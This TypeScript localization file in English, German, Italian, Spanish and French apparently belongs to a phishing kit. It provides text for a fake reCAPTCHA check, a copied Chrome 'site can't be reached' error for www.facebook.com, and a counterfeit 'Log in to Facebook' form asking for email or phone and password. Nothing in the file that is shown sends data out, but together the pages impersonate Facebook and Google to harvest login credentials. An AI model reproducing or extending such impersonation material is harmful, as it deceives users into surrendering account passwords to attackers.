export type SupportedLang = "en" | "de" | "it" | "es" | "fr";

type TranslationContent = {
  line0: string; // "I'm not a robot"
  line1: string;
  line2: string;
  line3: string;
};

type ErrorPageTranslation = {
  title: string;
  msg1: string;
  try: string;
  details: string;
  reload: string;
  errCode: string;
  steps: string[];
  showDetails: string;
  hideDetails: string;
  detailsSection: {
    title1: string;
    desc1: string;
    title2: string;
    desc2: string;
    title3: string;
    desc3: string;
    title4: string;
    desc4: string;
    title5: string;
    desc5: string;
  };
};

export const translations: Record<SupportedLang, TranslationContent> = {
  en: {
    line0: "I'm not a robot",
    line1:
      "This helps us to combat harmful conduct, detect and prevent spam and maintain the integrity of our Products.",
    line2:
      "We’ve used Google's reCAPTCHA Enterprise product to provide this security check. Your use of reCAPTCHA Enterprise is subject to Google’s Privacy Policy and Terms of Use.",
    line3:
      "reCAPTCHA Enterprise collects hardware and software information, such as device and application data, and sends it to Google to provide, maintain, and improve reCAPTCHA Enterprise and for general security purposes. This information is not used by Google for personalized advertising."
  },
  de: {
    line0: "Ich bin kein Roboter",
    line1:
      "Dies hilft uns, schädliches Verhalten zu bekämpfen, Spam zu erkennen und die Integrität unserer Produkte zu wahren.",
    line2:
      "Wir verwenden das reCAPTCHA Enterprise von Google, um diese Sicherheitsprüfung bereitzustellen. Die Nutzung unterliegt den Datenschutzrichtlinien und Nutzungsbedingungen von Google.",
    line3:
      "reCAPTCHA Enterprise sammelt Hardware- und Softwareinformationen und sendet sie an Google, um reCAPTCHA Enterprise bereitzustellen, zu warten und zu verbessern. Diese Informationen werden nicht für personalisierte Werbung verwendet."
  },
  it: {
    line0: "Non sono un robot",
    line1:
      "Questo ci aiuta a combattere comportamenti dannosi, rilevare e prevenire lo spam e mantenere l'integrità dei nostri prodotti.",
    line2:
      "Abbiamo utilizzato reCAPTCHA Enterprise di Google per fornire questo controllo di sicurezza. L'uso è soggetto alla Privacy Policy e ai Termini di utilizzo di Google.",
    line3:
      "reCAPTCHA Enterprise raccoglie informazioni hardware e software e le invia a Google per fornire, mantenere e migliorare il servizio. Queste informazioni non vengono utilizzate per pubblicità personalizzata."
  },
  es: {
    line0: "No soy un robot",
    line1:
      "Esto nos ayuda a combatir conductas nocivas, detectar y prevenir el spam y mantener la integridad de nuestros productos.",
    line2:
      "Usamos el producto reCAPTCHA Enterprise de Google para proporcionar esta verificación de seguridad. Su uso está sujeto a la Política de privacidad y los Términos de uso de Google.",
    line3:
      "reCAPTCHA Enterprise recopila información de hardware y software y la envía a Google para proporcionar, mantener y mejorar el servicio. Esta información no se utiliza para publicidad personalizada."
  },
  fr: {
    line0: "Je ne suis pas un robot",
    line1:
      "Cela nous aide à lutter contre les comportements nuisibles, à détecter et à prévenir le spam, et à maintenir l'intégrité de nos produits.",
    line2:
      "Nous utilisons reCAPTCHA Enterprise de Google pour fournir ce contrôle de sécurité. Votre utilisation est soumise à la politique de confidentialité et aux conditions d'utilisation de Google.",
    line3:
      "reCAPTCHA Enterprise collecte des informations matérielles et logicielles et les envoie à Google pour fournir, maintenir et améliorer le service. Ces informations ne sont pas utilisées à des fins publicitaires personnalisées."
  }
};

export const errorPage: Record<SupportedLang, ErrorPageTranslation> = {
  en: {
    title: "This site can’t be reached",
    msg1: "www.facebook.com’s server IP address could not be found.",
    try: "Try:",
    details: "Details",
    reload: "Reload",
    errCode: "ERR_NAME_NOT_RESOLVED",
    showDetails: "Details",
    hideDetails: "Hide details",
    steps: [
      "Checking the connection",
      "Checking the proxy, firewall, and DNS configuration",
      "Running Windows Network Diagnostics"
    ],
    detailsSection: {
      title1: "Check your Internet connection",
      desc1:
        "Check any cables and reboot any routers, modems, or other network devices you may be using.",
      title2: "Check your DNS settings",
      desc2:
        "Contact your network administrator if you're not sure what this means.",
      title3: "Try disabling network prediction",
      desc3:
        'Go to the Chrome menu &gt; Settings &gt; Show advanced settings... and deselect "Use a prediction service to load pages more quickly." If this does not resolve the issue, we recommend selecting this option again for improved performance.',
      title4:
        "Allow Chrome to access the network in your firewall or antivirus settings.",
      desc4:
        "If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.",
      title5: "If you use a proxy server...",
      desc5:
        'Go to the Chrome menu > Settings > Show advanced settings... > Change proxy settings... > LAN Settings and deselect "Use a proxy server for your LAN".'
    }
  },
  de: {
    title: "Diese Website ist nicht erreichbar",
    msg1: "Die IP-Adresse des Servers von www.facebook.com wurde nicht gefunden.",
    try: "Versuchen Sie Folgendes:",
    details: "Details",
    reload: "Neu laden",
    errCode: "ERR_NAME_NOT_RESOLVED",
    showDetails: "Details",
    hideDetails: "Details ausblenden",
    steps: [
      "Verbindung überprüfen",
      "Proxy-, Firewall- und DNS-Konfiguration prüfen",
      "Windows-Netzwerkdiagnose ausführen"
    ],
    detailsSection: {
      title1: "Überprüfen Sie Ihre Internetverbindung",
      desc1:
        "Überprüfen Sie alle Kabel und starten Sie Router, Modems oder andere Netzwerkgeräte neu.",
      title2: "Überprüfen Sie Ihre DNS-Einstellungen",
      desc2:
        "Wenden Sie sich an Ihren Netzwerkadministrator, wenn Sie sich nicht sicher sind, was das bedeutet.",
      title3: "Versuchen Sie, die Netzwerkprognose zu deaktivieren",
      desc3:
        'Gehen Sie im Chrome-Menü zu Einstellungen > Erweiterte Einstellungen anzeigen... und deaktivieren Sie "Einen Vorhersagedienst verwenden, um Seiten schneller zu laden". Wenn das Problem dadurch nicht behoben wird, empfehlen wir, die Option wieder zu aktivieren.',
      title4:
        "Erlauben Sie Chrome den Netzwerkzugriff in Ihrer Firewall oder Antivirus-Software.",
      desc4:
        "Wenn Chrome bereits als zugelassenes Programm aufgeführt ist, entfernen Sie es aus der Liste und fügen Sie es erneut hinzu.",
      title5: "Wenn Sie einen Proxyserver verwenden...",
      desc5:
        'Gehen Sie im Chrome-Menü zu Einstellungen > Erweiterte Einstellungen anzeigen... > Proxy-Einstellungen ändern... > LAN-Einstellungen und deaktivieren Sie "Proxyserver für LAN verwenden".'
    }
  },
  it: {
    title: "Impossibile raggiungere il sito",
    msg1: "L'indirizzo IP del server www.facebook.com non è stato trovato.",
    try: "Prova a:",
    details: "Dettagli",
    reload: "Ricarica",
    errCode: "ERR_NAME_NOT_RESOLVED",
    showDetails: "Dettagli",
    hideDetails: "Nascondi dettagli",
    steps: [
      "Verificare la connessione",
      "Controllare proxy, firewall e configurazione DNS",
      "Eseguire Diagnostica di rete di Windows"
    ],
    detailsSection: {
      title1: "Controlla la tua connessione Internet",
      desc1:
        "Controlla i cavi e riavvia eventuali router, modem o altri dispositivi di rete.",
      title2: "Controlla le impostazioni DNS",
      desc2: "Contatta l'amministratore di rete se non sai cosa significa.",
      title3: "Prova a disabilitare la previsione di rete",
      desc3:
        'Vai al menu di Chrome > Impostazioni > Mostra impostazioni avanzate... e deseleziona "Utilizza un servizio di previsione per caricare le pagine più velocemente". Se il problema persiste, ti consigliamo di riattivarlo.',
      title4:
        "Consenti a Chrome di accedere alla rete nel firewall o antivirus.",
      desc4:
        "Se è già presente nell'elenco dei programmi autorizzati, prova a rimuoverlo e ad aggiungerlo nuovamente.",
      title5: "Se utilizzi un server proxy...",
      desc5:
        'Vai al menu di Chrome > Impostazioni > Mostra impostazioni avanzate... > Modifica impostazioni proxy... > Impostazioni LAN e deseleziona "Utilizza un server proxy per la LAN".'
    }
  },
  es: {
    title: "No se puede acceder a este sitio",
    msg1: "No se pudo encontrar la dirección IP del servidor de www.facebook.com.",
    try: "Prueba a hacer lo siguiente:",
    details: "Detalles",
    reload: "Recargar",
    errCode: "ERR_NAME_NOT_RESOLVED",
    showDetails: "Detalles",
    hideDetails: "Ocultar detalles",
    steps: [
      "Comprobar la conexión",
      "Verificar la configuración de proxy, firewall y DNS",
      "Ejecutar el diagnóstico de red de Windows"
    ],
    detailsSection: {
      title1: "Verifica tu conexión a Internet",
      desc1:
        "Revisa los cables y reinicia cualquier router, módem u otros dispositivos de red que estés usando.",
      title2: "Revisa tu configuración de DNS",
      desc2:
        "Contacta con tu administrador de red si no sabes qué significa esto.",
      title3: "Intenta desactivar la predicción de red",
      desc3:
        'Ve al menú de Chrome > Configuración > Mostrar configuración avanzada... y desactiva "Usar un servicio de predicción para cargar páginas más rápidamente". Si esto no resuelve el problema, te recomendamos activarlo nuevamente.',
      title4: "Permite que Chrome acceda a la red en tu firewall o antivirus.",
      desc4:
        "Si ya está en la lista de programas permitidos, intenta eliminarlo y volver a agregarlo.",
      title5: "Si usas un servidor proxy...",
      desc5:
        'Ve al menú de Chrome > Configuración > Mostrar configuración avanzada... > Cambiar configuración de proxy... > Configuración de LAN y desactiva "Usar un servidor proxy para la LAN".'
    }
  },
  fr: {
    title: "Ce site est inaccessible",
    msg1: "L'adresse IP du serveur de www.facebook.com est introuvable.",
    try: "Essayez de:",
    details: "Détails",
    reload: "Recharger",
    errCode: "ERR_NAME_NOT_RESOLVED",
    showDetails: "Détails",
    hideDetails: "Masquer les détails",
    steps: [
      "Vérifier la connexion",
      "Vérifier le proxy, le pare-feu et la configuration DNS",
      "Exécuter le diagnostic réseau de Windows"
    ],
    detailsSection: {
      title1: "Vérifiez votre connexion Internet",
      desc1:
        "Vérifiez les câbles et redémarrez les routeurs, modems ou autres appareils réseau que vous utilisez.",
      title2: "Vérifiez vos paramètres DNS",
      desc2:
        "Contactez votre administrateur réseau si vous ne savez pas ce que cela signifie.",
      title3: "Essayez de désactiver la prédiction réseau",
      desc3:
        'Allez dans le menu Chrome > Paramètres > Afficher les paramètres avancés... et désélectionnez "Utiliser un service de prédiction pour charger les pages plus rapidement". Si cela ne résout pas le problème, nous vous recommandons de réactiver cette option.',
      title4:
        "Autorisez Chrome à accéder au réseau via votre pare-feu ou antivirus.",
      desc4:
        "S'il est déjà dans la liste des programmes autorisés, essayez de le supprimer puis de le rajouter.",
      title5: "Si vous utilisez un serveur proxy...",
      desc5:
        'Allez dans le menu Chrome > Paramètres > Afficher les paramètres avancés... > Modifier les paramètres proxy... > Paramètres LAN et désélectionnez "Utiliser un serveur proxy pour votre réseau local".'
    }
  }
};
type LoginTranslation = {
  mustLogin: string;
  loginToFacebook: string;
  invalidUserPass: string;
  passwordTooShort: string;
  unexpectedError: string;
  login: string;
  forgotten: string;
  or: string;
  createAccount: string;
  emailOrPhone: string;
  password: string;
};

export const loginForm: Record<SupportedLang, LoginTranslation> = {
  en: {
    mustLogin: "You must log in to continue.",
    loginToFacebook: "Log in to Facebook",
    invalidUserPass: "Invalid username or password.",
    passwordTooShort: "Password must be at least 6 characters.",
    unexpectedError: "An unexpected error occurred.",
    login: "Log in",
    emailOrPhone: "Email address or phone number",
    password: "Password",
    forgotten: "Forgotten account?",
    or: "or",
    createAccount: "Create new account"
  },
  de: {
    mustLogin: "Du musst dich anmelden, um fortzufahren.",
    loginToFacebook: "Bei Facebook anmelden",
    invalidUserPass: "Ungültiger Benutzername oder Passwort.",
    passwordTooShort: "Das Passwort muss mindestens 6 Zeichen lang sein.",
    unexpectedError: "Ein unerwarteter Fehler ist aufgetreten.",
    login: "Anmelden",
    forgotten: "Konto vergessen?",
    or: "oder",
    createAccount: "Neues Konto erstellen",
    emailOrPhone: "E-Mail-Adresse oder Telefonnummer",
    password: "Passwort"
  },
  fr: {
    mustLogin: "Vous devez vous connecter pour continuer.",
    loginToFacebook: "Connexion à Facebook",
    invalidUserPass: "Nom d'utilisateur ou mot de passe invalide.",
    passwordTooShort: "Le mot de passe doit contenir au moins 6 caractères.",
    unexpectedError: "Une erreur inattendue s'est produite.",
    login: "Connexion",
    forgotten: "Compte oublié ?",
    or: "ou",
    createAccount: "Créer un nouveau compte",
    emailOrPhone: "Adresse e-mail ou numéro de téléphone",
    password: "Mot de passe"
  },
  it: {
    mustLogin: "Devi accedere per continuare.",
    loginToFacebook: "Accedi a Facebook",
    invalidUserPass: "Nome utente o password non validi.",
    passwordTooShort: "La password deve contenere almeno 6 caratteri.",
    unexpectedError: "Si è verificato un errore imprevisto.",
    login: "Accedi",
    forgotten: "Account dimenticato?",
    or: "oppure",
    createAccount: "Crea un nuovo account",
    emailOrPhone: "Indirizzo email o numero di telefono",
    password: "Password"
  },
  es: {
    mustLogin: "Debes iniciar sesión para continuar.",
    loginToFacebook: "Iniciar sesión en Facebook",
    invalidUserPass: "Nombre de usuario o contraseña inválidos.",
    passwordTooShort: "La contraseña debe tener al menos 6 caracteres.",
    unexpectedError: "Ocurrió un error inesperado.",
    login: "Iniciar sesión",
    forgotten: "¿Has olvidado tu cuenta?",
    or: "o",
    createAccount: "Crear una cuenta nueva",
    emailOrPhone: "Correo electrónico o número de teléfono",
    password: "Contraseña"
  }
};
